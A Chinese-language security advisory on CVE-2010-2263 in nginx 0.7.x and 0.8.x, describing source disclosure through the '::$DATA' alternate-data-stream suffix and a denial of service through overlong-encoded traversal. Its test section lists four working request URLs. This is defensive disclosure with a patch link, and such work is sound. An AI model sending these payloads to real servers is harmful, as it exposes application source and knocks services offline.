安全研究

安全漏洞
nginx HTTP请求源码泄露和拒绝服务漏洞

发布日期:2010-06-11
更新日期:2010-06-13

受影响系统:
Igor Sysoev nginx 0.8.x
Igor Sysoev nginx 0.7.x
不受影响系统:
Igor Sysoev nginx 0.8.40
Igor Sysoev nginx 0.7.66
描述:
BUGTRAQ  ID: 40760
CVE ID: CVE-2010-2263

nginx是多平台的HTTP服务器和邮件代理服务器。

nginx服务器无法处理交换数据流(ADS),将其处理为普通文件的数据量。攻击者可以使用filename::$data的形式读取并下载Web应用文件的源码;此外如果在HTTP请求中添加了目录遍历序列的话,就可以覆盖内存寄存器,导致拒绝服务。

<*来源:Dr_IDE
        Jose Antonio Vazquez Gonzalez
  
  链接:http://www.exploit-db.com/exploits/13822/
        http://www.exploit-db.com/exploits/13818/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20

建议:
厂商补丁:

Igor Sysoev
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://nginx.org/download/nginx-0.8.40.zip

浏览次数:3116
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障